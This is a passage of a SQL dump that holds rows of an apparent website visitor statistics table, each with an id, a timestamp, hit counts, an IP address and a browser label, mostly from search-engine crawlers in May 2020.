,1589827843,1,1,0,0,'37.73.143.46','chrome'),(506282,1589827992,8,8,0,0,'77.120.98.235','other'),(506283,1589828069,1,1,0,0,'66.102.9.169','chrome'),(506284,1589828408,1,1,0,0,'66.249.70.69','chrome'),(506285,1589828998,2,2,0,0,'207.46.13.50','other'),(506286,1589829225,1,1,0,0,'108.167.133.20','chrome'),(506287,1589829248,1,1,0,0,'213.180.203.16','other'),(506288,1589829249,1,1,0,0,'108.167.189.66','chrome'),(506289,1589829394,1,1,0,0,'35.208.172.195','chrome'),(506290,1589829629,1,1,0,0,'192.254.250.163','chrome'),(506291,1589829667,1,1,0,0,'192.185.2.34','chrome'),(506292,1589829727,1,1,0,0,'108.167.189.24','chrome'),(506293,1589829932,1,1,0,0,'178.154.200.222','other'),(506294,1589829947,1,1,0,0,'207.46.13.23','other'),(506295,1589830160,1,1,0,0,'207.46.13.50','other'),(506296,1589830233,1,1,0,0,'62.171.135.115','firefox'),(506297,1589830292,8,8,0,0,'77.120.98.235','other'),(506298,1589830996,2,2,0,0,'108.179.242.207','chrome'),(506299,1589831046,1,1,0,0,'192.185.81.167','chrome'),(506300,1589831270,1,1,0,0,'162.241.224.125','chrome'),(506301,1589831286,1,1,0,0,'192.185.83.234','chrome'),(506302,1589831381,1,1,0,0,'50.87.144.87','chrome'),(506303,1589831439,1,1,0,0,'213.180.203.81','other'),(506304,1589831624,1,1,0,0,'207.46.13.23','other'),(506305,1589831639,1,1,0,0,'50.87.152.102','chrome'),(506306,1589831657,1,1,0,0,'178.154.200.245','other'),(506307,1589831682,1,1,0,0,'66.249.64.33','chrome'),(506308,1589831738,1,1,0,0,'192.185.83.94','chrome'),(506309,1589832099,1,1,0,0,'134.209.26.12','chrome'),(506310,1589832421,1,1,0,0,'66.249.70.72','chrome'),(506311,1589832494,1,1,0,0,'67.222.133.14','chrome'),(506312,1589832590,8,8,0,0,'77.120.98.235','other'),(506313,1589832617,2,2,0,0,'150.95.104.221','chrome'),(506314,1589832745,2,2,0,0,'35.208.172.195','chrome'),(506315,1589832794,1,1,0,0,'162.241.219.209','chrome'),(506316,1589833022,2,2,0,0,'192.185.2.194','chrome'),(506317,1589833100,2,2,0,0,'51.68.11.223','chrome'),(506318,1589833249,1,1,0,0,'192.185.4.44','chrome'),(506319,1589833397,2,2,0,0,'207.46.13.23','other'),(506320,1589833477,1,1,0,0,'66.249.70.69','chrome'),(506321,1589834067,2,2,0,0,'95.213.141.126','opera'),(506322,1589834104,1,1,0,0,'8.29.198.27','other'),(506323,1589834323,1,1,0,0,'8.29.198.26','other'),(506324,1589834933,8,8,0,0,'77.120.98.235','other'),(506325,1589835397,1,1,0,0,'157.55.39.42','other'),(506326,1589835914,1,1,0,0,'157.55.39.82','other'),(506327,1589836817,2,2,0,0,'157.55.39.82','other'),(506328,1589837170,8,8,0,0,'77.120.98.235','other'),(506329,1589838281,1,1,0,0,'66.249.70.72','chrome'),(506330,1589838369,1,1,0,0,'66.249.64.33','chrome'),(506331,1589839134,1,1,0,0,'207.46.13.50','other'),(506332,1589839252,1,1,0,0,'207.46.13.23','other'),(506333,1589839410,2,2,0,0,'66.249.70.69','chrome'),(506334,1589839437,8,8,0,0,'77.120.98.235','other'),(506335,1589840458,1,1,0,0,'66.249.70.70','chrome'),(506336,1589840460,1,1,0,0,'207.46.13.50','other'),(506337,1589840582,1,1,0,0,'213.180.203.122','other'),(506338,1589840627,2,2,0,0,'157.55.39.82','other'),(506339,1589841160,1,1,0,0,'66.249.70.69','chrome'),(506340,1589841689,8,8,0,0,'77.120.98.235','other'),(506341,1589842216,1,1,0,0,'178.154.200.222','other'),(506342,1589843392,1,1,0,0,'66.249.70.72','chrome'),(506343,1589843963,8,8,0,0,'77.120.98.235','other'),(506344,1589844329,1,1,0,0,'157.55.39.82','other'),(506345,1589844927,2,2,0,0,'8.29.198.26','other'),(506346,1589846106,1,1,0,0,'62.205.134.182','other'),(506347,1589846226,8,8,0,0,'77.120.98.235','other'),(506348,1589847721,1,1,0,0,'157.55.39.82','other'),(506349,1589848017,1,1,0,0,'207.46.13.97','other'),(506350,1589848648,8,8,0,0,'77.120.98.235','other'),(506351,1589849305,1,1,0,0,'207.46.13.97','other'),(506352,1589849530,2,2,0,0,'178.154.200.222','other'),(506353,1589850702,1,1,0,0,'207.46.13.97','other'),(506354,1589850836,1,1,0,0,'178.154.200.220','other'),(506355,1589850943,8,8,0,0,'77.120.98.235','other'),(506356,1589851478,3,3,0,0,'54.36.185.97','other'),(506357,1589852494,2,2,0,0,'157.55.39.82','other'),(506358,1589853280,8,8,0,0,'77.120.98.235','other'),(506359,1589854329,2,2,0,0,'157.55.39.82','other'),(506360,1589855497,8,8,0,0,'77.120.98.235','other'),(506361,1589855748,1,1,0,0,'8.29.198.26','other'),(506362,1589855985,1,1,0,0,'8.29.198.27','other'),(506363,1589857817,8,8,0,0,'77.120.98.235','other'),(506364,1589858697,1,1,0,0,'176.214.77.92','chrome'),(506365,1589858888,3,3,0,0,'157.55.39.82','other'),(506366,1589859334,1,1,0,0,'66.249.70.72','chrome'),(506367,1589860222,8,8,0,0,'77.120.98.235','other'),(506368,1589861309,1,1,0,0,'207.46.13.40','other'),(506369,1589861577,1,1,0,0,'209.17.96.178','other'),(506370,1589862663,8,8,0,0,'77.120.98.235','other'),(506371,1589862872,2,2,0,0,'157.55.39.82','other'),(506372,1589863365,1,1,0,0,'207.46.13.40','other'),(506373,1589863569,1,1,0,0,'62.205.134.182','other'),(506374,1589864232,1,1,0,0,'66.249.70.70','chrome'),(506375,1589865145,8,8,0,0,'77.120.98.235','other'),(506376,1589865198,1,1,0,0,'157.55.39.82','other'),(506377,1589866042,1,1,0,0,'66.102.9.164','chrome'),(506378,1589866451,1,1,0,0,'66.249.70.72','chrome'),(506379,1589866577,1,1,0,0,'8.29.198.27','other'),(506380,1589866818,1,1,0,0,'8.29.198.26','other'),(506381,1589867404,1,1,0,0,'157.55.39.82','other'),(506382,1589867678,1,1,0,0,'91.124.181.168','chrome'),(506383,1589867703,1,1,0,0,'94.153.15.189','chrome'),(506384,1589867792,8,8,0,0,'77.120.98.235','other'),(506385,1589869224,1,1,0,0,'66.249.70.69','chrome'),(506386,1589869474,1,1,0,0,'178.159.37.69','chrome'),(506387,1589869509,1,1,0,0,'188.163.75.43','msie'),(506388,1589869825,1,1,0,0,'66.249.70.70','chrome'),(506389,1589869928,1,1,0,0,'207.46.13.40','other'),(506390,1589870035,1,1,0,0,'17.58.99.84','other'),(506391,1589870238,1,1,0,0,'142.93.170.54','chrome'),(506392,1589870422,1,1,0,0,'176.36.168.224','chrome'),(506393,1589870433,1,1,0,0,'188.163.75.43','msie'),(506394,1589870682,8,8,0,0,'77.120.98.235','other'),(506395,1589871470,1,1,0,0,'188.163.75.43','msie'),(506396,1589871933,1,1,0,0,'207.46.13.40','other'),(506397,1589871993,1,1,0,0,'91.196.177.46','chrome'),(506398,1589872129,1,1,0,0,'131.220.6.152','chrome'),(506399,1589872932,2,2,0,0,'157.55.39.82','other'),(506400,1589873139,1,1,0,0,'66.249.70.70','chrome'),(506401,1589873413,1,1,0,0,'207.46.13.40','other'),(506402,1589873667,8,8,0,0,'77.120.98.235','other'),(506403,1589874348,1,1,0,0,'51.15.159.90','firefox'),(506404,1589874453,1,1,0,0,'91.196.178.186','chrome'),(506405,1589874473,1,1,0,0,'207.46.13.40','other'),(506406,1589876507,1,1,0,0,'132.148.251.230','chrome'),(506407,1589876619,8,8,0,0,'77.120.98.235','other'),(506408,1589876731,1,1,0,0,'157.55.39.82','other'),(506409,1589877405,1,1,0,0,'8.29.198.25','other'),(506410,1589877644,1,1,0,0,'8.29.198.27','other'),(506411,1589877712,1,1,0,0,'194.1.195.225','chrome'),(506412,1589877748,1,1,0,0,'178.95.12.61','chrome'),(506413,1589877867,1,1,0,0,'91.209.11.236','other'),(506414,1589878176,1,1,0,0,'157.55.39.82','other'),(506415,1589878456,1,1,0,0,'46.211.132.72','other'),(506416,1589879549,8,8,0,0,'77.120.98.235','other'),(506417,1589879883,1,1,0,0,'207.46.13.111','other'),(506418,1589881166,1,1,0,0,'46.211.53.184','other'),(506419,1589881639,1,1,0,0,'212.26.142.27','other'),(506420,1589882045,1,1,0,0,'66.249.70.70','chrome'),(506421,1589882771,1,1,0,0,'82.202.161.133','other'),(506422,1589882788,8,8,0,0,'77.120.98.235','other'),(506423,1589883045,1,1,0,0,'66.249.70.69','chrome'),(506424,1589883167,1,1,0,0,'93.72.232.196','chrome'),(506425,1589883232,1,1,0,0,'207.46.13.128','other'),(506426,1589883583,1,1,0,0,'100.24.120.121','chrome'),(506427,1589883648,1,1,0,0,'64.246.165.180','firefox'),(506428,1589883800,1,1,0,0,'157.55.39.147','other'),(506429,1589884714,1,1,0,0,'207.46.13.128','other'),(506430,1589885046,1,1,0,0,'188.163.75.43','msie'),(506431,1589885859,1,1,0,0,'157.55.39.147','other'),(506432,1589886336,8,8,0,0,'77.120.98.235','other'),(506433,1589886661,1,1,0,0,'109.74.154.72','chrome'),(506434,1589886925,1,1,0,0,'157.55.39.147','other'),(506435,1589888039,1,1,0,0,'91.210.118.22','firefox'),(506436,1589888238,1,1,0,0,'8.29.198.25','other'),(506437,1589888283,1,1,0,0,'157.55.39.147','other'),(506438,1589888467,1,1,0,0,'8.29.198.27','other'),(506439,1589889497,1,1,0,0,'207.46.13.128','other'),(506440,1589889953,8,8,0,0,'77.120.98.235','other'),(506441,1589890083,1,1,0,0,'91.196.177.46','chrome'),(506442,1589890219,2,2,0,0,'157.55.39.147','other'),(506443,1589890228,1,1,0,0,'207.46.13.111','other'),(506444,1589890304,1,1,0,0,'91.196.178.144','firefox'),(506445,1589890840,1,1,0,0,'91.196.178.65','chrome'),(506446,1589892366,1,1,0,0,'207.46.13.128','other'),(506447,1589892388,2,2,0,0,'157.55.39.147','other'),(506448,1589893616,2,2,0,0,'91.196.178.135','chrome'),(506449,1589893628,8,8,0,0,'77.120.98.235','other'),(506450,1589893957,1,1,0,0,'157.55.39.147','other'),(506451,1589894404,1,1,0,0,'207.46.13.128','other'),(506452,1589894996,1,1,0,0,'67.20.113.97','chrome'),(506453,1589895888,1,1,0,0,'207.46.13.128','other'),(506454,1589896649,1,1,0,0,'46.211.54.110','chrome'),(506455,1589896676,1,1,0,0,'195.10.210.70','chrome'),(506456,1589897226,8,8,0,0,'77.120.98.235','other'),(506457,1589897309,1,1,0,0,'84.94.175.80','chrome'),(506458,1589897529,1,1,0,0,'178.154.200.222','other'),(506459,1589897756,1,1,0,0,'91.196.178.76','chrome'),(506460,1589899069,1,1,0,0,'8.29.198.27','other'),(506461,1589899293,1,1,0,0,'8.29.198.26','other'),(506462,1589899464,1,1,0,0,'207.46.13.128','other'),(506463,1589900087,1,1,0,0,'157.55.39.147','other'),(506464,1589900713,1,1,0,0,'93.159.230.28','chrome'),(506465,1589900831,8,8,0,0,'77.120.98.235','other'),(506466,1589901137,1,1,0,0,'188.163.75.43','msie'),(506467,1589901545,1,1,0,0,'46.201.200.170','chrome'),(506468,1589902118,4,4,0,0,'207.46.13.128','other'),(506469,1589902517,1,1,0,0,'188.163.75.43','msie'),(506470,1589904995,8,8,0,0,'77.120.98.235','other'),(506471,1589905357,2,2,0,0,'207.46.13.128','other'),(506472,1589906132,1,1,0,0,'52.215.184.109','chrome'),(506473,1589906518,2,2,0,0,'157.55.39.147','other'),(506474,1589907378,1,1,0,0,'91.196.178.87','firefox'),(506475,1589908248,1,1,0,0,'194.61.24.94','other'),(506476,1589908794,2,2,0,0,'157.55.39.147','other'),(506477,1589908803,1,1,0,0,'172.247.132.226','firefox'),(506478,1589909091,1,1,0,0,'207.46.13.219','other'),(506479,1589909272,8,8,0,0,'77.120.98.235','other'),(506480,1589909648,1,1,0,0,'130.180.210.73','chrome'),(506481,1589909898,2,2,0,0,'8.29.198.25','other'),(506482,1589911805,1,1,0,0,'188.163.75.43','msie'),(506483,1589912301,1,1,0,0,'178.154.200.222','other'),(506484,1589912530,1,1,0,0,'213.180.203.140','other'),(506485,1589912576,1,1,0,0,'66.249.70.69','chrome'),(506486,1589912873,1,1,0,0,'88.155.108.18','chrome'),(506487,1589913583,8,8,0,0,'77.120.98.235','other'),(506488,1589913757,1,1,0,0,'66.249.70.70','chrome'),(506489,1589914232,1,1,0,0,'207.46.13.219','other'),(506490,1589915094,1,1,0,0,'157.55.39.153','other'),(506491,1589915598,1,1,0,0,'213.180.203.16','other'),(506492,1589916593,1,1,0,0,'213.180.203.101','other'),(506493,1589916655,1,1,0,0,'178.154.200.220','other'),(506494,1589916923,1,1,0,0,'207.46.13.128','other'),(506495,1589916982,1,1,0,0,'91.196.178.13','chrome'),(506496,1589917056,1,1,0,0,'66.249.70.69','chrome'),(506497,1589917669,1,1,0,0,'178.154.200.77','other'),(506498,1589918436,1,1,0,0,'178.154.200.196','other'),(506499,1589918441,8,8,0,0,'77.120.98.235','other'),(506500,1589918565,1,1,0,0,'91.196.178.141','chrome'),(506501,1589918835,2,2,0,0,'207.46.13.219','other'),(506502,1589918856,1,0,1,0,'66.249.64.38',''),(506503,1589919354,1,1,0,0,'213.180.203.81','other'),(506504,1589919392,2,2,0,0,'157.55.39.153','other'),(506505,1589919594,1,1,0,0,'188.163.75.43','msie'),(506506,1589919873,1,1,0,0,'178.154.200.196','other'),(506507,1589919933,1,1,0,0,'207.46.13.128','other'),(506508,1589920657,1,1,0,0,'66.249.70.70','chrome'),(506509,1589920728,2,2,0,0,'8.29.198.27','other'),(506510,1589920925,1,1,0,0,'157.55.39.153','other'),(506511,1589921377,1,1,0,0,'178.154.200.97','other'),(506512,1589922308,1,1,0,0,'157.55.39.153','other'),(506513,1589922406,1,1,0,0,'213.180.203.155','other'),(506514,1589922441,8,8,0,0,'77.120.98.235','other'),(506515,1589922976,1,1,0,0,'66.249.70.72','chrome'),(506516,1589923423,1,1,0,0,'178.154.200.196','other'),(506517,1589923665,1,1,0,0,'213.180.203.16','other'),(506518,1589924384,1,1,0,0,'207.46.13.219','other'),(506519,1589924587,1,1,0,0,'207.46.13.128','other'),(506520,1589926501,8,8,0,0,'77.120.98.235','other'),(506521,1589927873,2,2,0,0,'178.154.200.222','other'),(506522,1589927942,1,1,0,0,'213.180.203.95','other'),(506523,1589928065,1,1,0,0,'178.154.200.245','other'),(506524,1589928270,1,1,0,0,'178.154.200.19','other'),(506525,1589928272,2,2,0,0,'157.55.39.153','other'),(506526,1589928378,1,1,0,0,'213.180.203.16','other'),(506527,1589928928,2,2,0,0,'207.46.13.219','other'),(506528,1589929371,1,1,0,0,'66.249.64.38','chrome'),(506529,1589929587,1,1,0,0,'178.154.200.220','other'),(506530,1589929647,1,1,0,0,'66.249.70.72','chrome'),(506531,1589930168,1,1,0,0,'178.154.200.155','other'),(506532,1589930470,1,1,0,0,'207.46.13.219','other'),(506533,1589930950,8,8,0,0,'77.120.98.235','other'),(506534,1589931201,2,2,0,0,'178.154.200.222','other'),(506535,1589931461,2,2,0,0,'66.249.70.72','chrome'),(506536,1589931548,2,2,0,0,'8.29.198.25','other'),(506537,1589932010,1,1,0,0,'157.55.39.153','other'),(506538,1589932505,1,1,0,0,'62.205.134.182','other'),(506539,1589932518,1,1,0,0,'178.154.200.85','other'),(506540,1589932844,1,1,0,0,'157.55.39.99','other'),(506541,1589933014,1,1,0,0,'66.249.70.70','chrome'),(506542,1589933148,1,1,0,0,'157.55.39.198','other'),(506543,1589933265,1,1,0,0,'66.249.64.38','chrome'),(506544,1589933832,1,1,0,0,'178.154.200.241','other'),(506545,1589935400,8,8,0,0,'77.120.98.235','other'),(506546,1589935751,1,1,0,0,'157.55.39.99','other'),(506547,1589935806,1,1,0,0,'91.209.11.236','other'),(506548,1589936536,1,1,0,0,'66.249.70.72','chrome'),(506549,1589936741,2,2,0,0,'157.55.39.153','other'),(506550,1589937383,1,1,0,0,'178.154.200.92','other'),(506551,1589937809,1,1,0,0,'157.55.39.153','other'),(506552,1589938072,1,1,0,0,'213.180.203.50','other'),(506553,1589938241,1,1,0,0,'157.55.39.99','other'),(506554,1589938347,2,2,0,0,'157.55.39.198','other'),(506555,1589938360,1,1,0,0,'178.154.200.207','other'),(506556,1589938912,1,1,0,0,'66.249.70.69','chrome'),(506557,1589939023,1,1,0,0,'178.154.200.245','other'),(506558,1589939178,1,1,0,0,'213.180.203.142','other'),(506559,1589939603,1,1,0,0,'213.180.203.6','other'),(506560,1589939619,1,1,0,0,'66.249.70.70','chrome'),(506561,1589939686,2,2,0,0,'178.154.200.222','other'),(506562,1589940249,1,1,0,0,'178.154.200.220','other'),(506563,1589940335,1,1,0,0,'213.180.203.95','other'),(506564,1589940445,8,8,0,0,'77.120.98.235','other'),(506565,1589940934,1,1,0,0,'213.180.203.16','other'),(506566,1589942373,1,1,0,0,'8.29.198.27','other'),(506567,1589942376,1,1,0,0,'178.154.200.17','other'),(506568,1589942386,1,1,0,0,'213.180.203.146','other'),(506569,1589942611,1,1,0,0,'8.29.198.25','other'),(506570,1589942696,1,1,0,0,'178.154.200.220','other'),(506571,1589943056,1,1,0,0,'213.180.203.158','other'),(506572,1589943630,1,1,0,0,'46.4.107.106','other'),(506573,1589944956,1,1,0,0,'178.154.200.222','other'),(506574,1589945102,1,1,0,0,'213.180.203.16','other'),(506575,1589945507,1,1,0,0,'178.154.200.87','other'),(506576,1589946055,8,8,0,0,'77.120.98.235','other'),(506577,1589947649,1,1,0,0,'157.55.39.198','other'),(506578,1589947708,1,1,0,0,'213.180.203.148','other'),(506579,1589948958,1,1,0,0,'213.180.203.16','other'),(506580,1589949253,1,1,0,0,'178.154.200.220','other'),(506581,1589949607,1,1,0,0,'178.154.200.222','other'),(506582,1589950116,1,1,0,0,'66.249.70.72','chrome'),(506583,1589950539,1,1,0,0,'62.205.134.182','other'),(506584,1589951144,1,1,0,0,'213.180.203.95','other'),(506585,1589951827,1,1,0,0,'178.154.200.236','other'),(506586,1589951828,1,1,0,0,'178.154.200.92','other'),(506587,1589951991,1,1,0,0,'178.154.200.19','other'),(506588,1589952056,2,2,0,0,'157.55.39.153','other'),(506589,1589952059,1,1,0,0,'178.154.200.196','other'),(506590,1589952232,1,1,0,0,'46.243.145.132','firefox'),(506591,1589952334,2,2,0,0,'178.154.200.222','other'),(506592,1589952567,1,1,0,0,'157.55.39.198','other'),(506593,1589952598,8,8,0,0,'77.120.98.235','other'),(506594,1589953200,2,2,0,0,'8.29.198.25','other'),(506595,1589953352,1,1,0,0,'178.154.200.222','other'),(506596,1589953794,1,1,0,0,'178.154.200.155','other'),(506597,1589954227,1,1,0,0,'95.152.62.153','chrome'),(506598,1589954445,1,1,0,0,'157.55.39.198','other'),(506599,1589955382,1,1,0,0,'178.154.200.176','other'),(506600,1589955465,1,1,0,0,'178.154.200.86','other'),(506601,1589955673,1,1,0,0,'178.154.200.47','other'),(506602,1589955727,1,1,0,0,'178.154.200.92','other'),(506603,1589956216,1,1,0,0,'157.55.39.153','other'),(506604,1589956388,1,1,0,0,'62.210.83.78','firefox'),(506605,1589956558,1,1,0,0,'157.55.39.99','other'),(506606,1589956667,1,1,0,0,'178.154.200.222','other'),(506607,1589956720,1,1,0,0,'178.154.200.155','other'),(506608,1589957015,1,1,0,0,'178.154.200.43','other'),(506609,1589957373,1,1,0,0,'162.213.38.36','chrome'),(506610,1589957750,1,1,0,0,'213.180.203.70','other'),(506611,1589958544,1,1,0,0,'131.220.6.152','chrome'),(506612,1589958620,1,1,0,0,'213.180.203.16','other'),(506613,1589958666,1,1,0,0,'91.196.177.228','chrome'),(506614,1589958753,8,8,0,0,'77.120.98.235','other'),(506615,1589958781,1,1,0,0,'157.55.39.153','other'),(506616,1589959104,1,1,0,0,'213.180.203.142','other'),(506617,1589960449,1,1,0,0,'46.164.130.94','chrome'),(506618,1589961068,2,2,0,0,'157.55.39.164','other'),(506619,1589961073,3,3,0,0,'157.55.39.153','other'),(506620,1589961197,1,1,0,0,'77.75.150.134','chrome'),(506621,1589961332,1,1,0,0,'178.154.200.245','other'),(506622,1589961475,1,1,0,0,'178.92.8.116','chrome'),(506623,1589961930,1,1,0,0,'213.180.203.16','other'),(506624,1589962333,1,1,0,0,'95.174.220.112','chrome'),(506625,1589962560,1,1,0,0,'213.180.203.122','other'),(506626,1589963058,1,1,0,0,'157.55.39.153','other'),(506627,1589963646,2,2,0,0,'157.55.39.99','other'),(506628,1589964023,1,1,0,0,'8.29.198.25','other'),(506629,1589964264,1,1,0,0,'8.29.198.27','other'),(506630,1589964316,2,2,0,0,'157.55.39.153','other'),(506631,1589965125,1,1,0,0,'178.154.200.222','other'),(506632,1589965442,1,1,0,0,'213.180.203.16','other'),(506633,1589965571,1,1,0,0,'157.55.39.164','other'),(506634,1589966142,1,1,0,0,'178.154.200.220','other'),(506635,1589966179,8,8,0,0,'77.120.98.235','other'),(506636,1589967933,1,1,0,0,'91.196.178.70','chrome'),(506637,1589967945,1,1,0,0,'176.103.133.42','chrome'),(506638,1589968546,2,2,0,0,'157.55.39.164','other'),(506639,1589969026,2,2,0,0,'178.154.200.222','other'),(506640,1589969326,1,1,0,0,'217.115.104.106','chrome'),(506641,1589969790,1,1,0,0,'157.55.39.153','other'),(506642,1589970584,1,1,0,0,'3.221.163.32','chrome'),(506643,1589971352,1,1,0,0,'157.55.39.153','other'),(506644,1589972629,1,1,0,0,'66.249.70.72','chrome'),(506645,1589972758,1,1,0,0,'176.111.33.18','firefox'),(506646,1589972858,2,2,0,0,'95.213.141.126','opera'),(506647,1589972899,1,1,0,0,'195.5.27.47','chrome'),(506648,1589973589,8,8,0,0,'77.120.98.235','other'),(506649,1589974106,1,1,0,0,'157.55.39.164','other'),(506650,1589974417,1,1,0,0,'213.180.203.119','other'),(506651,1589974443,1,1,0,0,'66.249.70.72','chrome'),(506652,1589974847,2,2,0,0,'8.29.198.25','other'),(506653,1589975233,1,1,0,0,'157.55.39.164','other'),(506654,1589975655,1,1,0,0,'109.74.154.72','chrome'),(506655,1589975991,1,1,0,0,'178.154.200.156','other'),(506656,1589977670,2,2,0,0,'157.55.39.104','other'),(506657,1589978173,1,1,0,0,'157.55.39.108','other'),(506658,1589978734,1,1,0,0,'66.249.70.69','chrome'),(506659,1589978952,1,1,0,0,'193.108.249.197','firefox'),(506660,1589979143,1,1,0,0,'91.196.178.69','firefox'),(506661,1589979189,2,2,0,0,'157.55.39.104','other'),(506662,1589979437,2,2,0,0,'157.55.39.108','other'),(506663,1589982167,2,2,0,0,'157.55.39.108','other'),(506664,1589982516,2,2,0,0,'157.55.39.104','other'),(506665,1589982724,1,1,0,0,'66.249.70.72','chrome'),(506666,1589982952,3,3,0,0,'178.154.200.222','other'),(506667,1589983073,8,8,0,0,'77.120.98.235','other'),(506668,1589983859,1,1,0,0,'66.249.70.70','chrome'),(506669,1589983893,4,4,0,0,'178.154.200.222','other'),(506670,1589984510,1,1,0,0,'157.55.39.108','other'),(506671,1589985116,1,1,0,0,'178.154.200.196','other'),(506672,1589985316,1,1,0,0,'157.55.39.164','other'),(506673,1589985675,1,1,0,0,'8.29.198.27','other'),(506674,1589985717,3,3,0,0,'178.154.200.222','other'),(506675,1589985925,1,1,0,0,'8.29.198.26','other'),(506676,1589986970,1,1,0,0,'178.154.200.222','other'),(506677,1589987164,1,1,0,0,'157.55.39.108','other'),(506678,1589987366,1,1,0,0,'194.61.24.94','other'),(506679,1589987864,2,2,0,0,'157.55.39.164','other'),(506680,1589988930,1,1,0,0,'178.154.200.19','other'),(506681,1589989587,1,1,0,0,'213.180.203.142','other'),(506682,1589989660,4,4,0,0,'109.70.104.23','chrome'),(506683,1589989757,1,1,0,0,'207.46.13.196','other'),(506684,1589990384,1,1,0,0,'178.154.200.196','other'),(506685,1589990669,1,1,0,0,'37.73.126.10','chrome'),(506686,1589991110,1,1,0,0,'157.55.39.164','other'),(506687,1589991810,1,1,0,0,'35.214.87.139','other'),(506688,1589991816,1,1,0,0,'35.196.35.49','other'),(506689,1589991898,1,1,0,0,'213.180.203.16','other'),(506690,1589992443,1,1,0,0,'178.154.200.245','other'),(506691,1589992500,1,1,0,0,'188.163.75.242','chrome'),(506692,1589993014,2,2,0,0,'178.154.200.222','other'),(506693,1589993148,2,2,0,0,'207.46.13.196','other'),(506694,1589994461,8,8,0,0,'77.120.98.235','other'),(506695,1589994918,1,1,0,0,'157.55.39.104','other'),(506696,1589995100,1,1,0,0,'207.46.13.196','other'),(506697,1589995658,3,3,0,0,'178.154.200.222','other'),(506698,1589996197,1,1,0,0,'88.155.180.50','chrome'),(506699,1589996502,2,2,0,0,'8.29.198.27','other'),(506700,1589996809,1,1,0,0,'178.154.200.222','other'),(506701,1589996944,1,1,0,0,'157.55.39.164','other'),(506702,1589997068,8,8,0,0,'77.120.98.235','other'),(506703,1589997086,2,2,0,0,'207.46.13.180','other'),(506704,1589997549,1,1,0,0,'209.17.97.82','other'),(506705,1589998107,2,2,0,0,'178.154.200.222','other'),(506706,1589999345,1,1,0,0,'178.154.200.119','other'),(506707,1589999383,2,2,0,0,'157.55.39.104','other'),(506708,1589999521,8,8,0,0,'77.120.98.235','other'),(506709,1589999598,1,1,0,0,'178.154.200.97','other'),(506710,1589999670,1,1,0,0,'207.46.13.196','other'),(506711,1589999691,2,2,0,0,'213.180.203.16','other'),(506712,1590000053,3,3,0,0,'178.154.200.222','other'),(506713,1590000270,1,1,0,0,'207.46.13.109','other'),(506714,1590000438,2,2,0,0,'157.55.39.164','other'),(506715,1590000456,1,1,0,0,'178.154.200.220','other'),(506716,1590001195,2,2,0,0,'178.154.200.222','other'),(506717,1590001368,1,1,0,0,'157.55.39.164','other'),(506718,1590001919,8,8,0,0,'77.120.98.235','other'),(506719,1590001981,1,1,0,0,'157.55.39.248','other'),(506720,1590002040,1,1,0,0,'213.180.203.122','other'),(506721,1590002144,1,1,0,0,'213.180.203.109','other'),(506722,1590002737,1,1,0,0,'178.154.200.222','other'),(506723,1590003100,2,2,0,0,'157.55.39.248','other'),(506724,1590003120,1,1,0,0,'157.55.39.164','other'),(506725,1590003130,1,1,0,0,'178.154.200.220','other'),(506726,1590003842,1,1,0,0,'66.249.70.72','chrome'),(506727,1590003855,2,2,0,0,'178.154.200.222','other'),(506728,1590004010,1,1,0,0,'178.154.200.236','other'),(506729,1590004246,8,8,0,0,'77.120.98.235','other'),(506730,1590004280,1,1,0,0,'213.180.203.16','other'),(506731,1590004494,1,1,0,0,'207.46.13.109','other'),(506732,1590004525,1,1,0,0,'157.55.39.164','other'),(506733,1590005119,1,1,0,0,'213.180.203.90','other'),(506734,1590005174,3,3,0,0,'178.154.200.222','other'),(506735,1590005639,1,1,0,0,'66.249.70.72','chrome'),(506736,1590006065,8,8,0,0,'77.120.98.235','other'),(506737,1590006143,2,2,0,0,'157.55.39.248','other'),(506738,1590006256,1,1,0,0,'157.55.39.164','other'),(506739,1590006312,3,3,0,0,'178.154.200.222','other'),(506740,1590007264,2,2,0,0,'178.154.200.222','other'),(506741,1590007328,1,1,0,0,'8.29.198.27','other'),(506742,1590007531,8,8,0,0,'77.87.41.66','other'),(506743,1590007578,1,1,0,0,'8.29.198.26','other'),(506744,1590007702,1,1,0,0,'207.46.13.109','other'),(506745,1590007724,1,1,0,0,'82.202.167.54','chrome'),(506746,1590007738,8,8,0,0,'77.120.98.235','other'),(506747,1590008269,1,1,0,0,'157.55.39.164','other'),(506748,1590008271,1,1,0,0,'178.154.200.222','other'),(506749,1590008920,1,1,0,0,'178.154.200.97','other'),(506750,1590008925,2,2,0,0,'77.87.41.66','other'),(506751,1590008928,6,6,0,0,'77.87.41.75','other'),(506752,1590008972,1,1,0,0,'213.180.203.109','other'),(506753,1590009396,1,1,0,0,'157.55.39.164','other'),(506754,1590009435,1,1,0,0,'52.19.78.211','chrome'),(506755,1590009933,8,8,0,0,'77.120.98.235','other'),(506756,1590010207,1,1,0,0,'157.55.39.248','other'),(506757,1590010219,1,1,0,0,'178.154.200.92','other'),(506758,1590010291,5,5,0,0,'77.87.41.66','other'),(506759,1590010296,3,3,0,0,'77.87.41.75','other'),(506760,1590010612,205,205,0,0,'62.138.18.43','other'),(506761,1590010704,2,2,0,0,'178.154.200.222','other'),(506762,1590010987,1,1,0,0,'213.180.203.16','other'),(506763,1590011440,1,1,0,0,'157.55.39.164','other'),(506764,1590011514,456,456,0,0,'62.138.18.43','other'),(506765,1590011627,1,1,0,0,'157.55.39.104','other'),(506766,1590011646,4,4,0,0,'178.154.200.222','other'),(506767,1590011665,8,8,0,0,'77.87.41.66','other'),(506768,1590012090,1,1,0,0,'213.180.203.16','other'),(506769,1590012120,8,8,0,0,'77.120.98.235','other'),(506770,1590012416,460,460,0,0,'62.138.18.43','other'),(506771,1590012858,2,2,0,0,'178.154.200.222','other'),(506772,1590012899,1,1,0,0,'157.55.39.104','other'),(506773,1590013067,1,1,0,0,'178.154.200.220','other'),(506774,1590013175,8,8,0,0,'77.87.41.5','other'),(506775,1590013317,486,486,0,0,'62.138.18.43','other'),(506776,1590013521,1,1,0,0,'178.154.200.155','other'),(506777,1590013625,2,2,0,0,'157.55.39.164','other'),(506778,1590014019,2,2,0,0,'178.154.200.220','other'),(506779,1590014130,2,2,0,0,'178.154.200.196','other'),(506780,1590014166,2,2,0,0,'213.180.203.16','other'),(506781,1590014218,199,199,0,0,'62.138.18.43','other'),(506782,1590014269,8,8,0,0,'77.120.98.235','other'),(506783,1590014559,1,1,0,0,'213.180.203.122','other'),(506784,1590014632,7,7,0,0,'77.87.41.66','other'),(506785,1590014643,1,1,0,0,'77.87.41.75','other'),(506786,1590014670,2,2,0,0,'207.46.13.109','other'),(506787,1590014673,2,2,0,0,'178.154.200.236','other'),(506788,1590014821,1,1,0,0,'66.249.70.69','chrome'),(506789,1590015003,2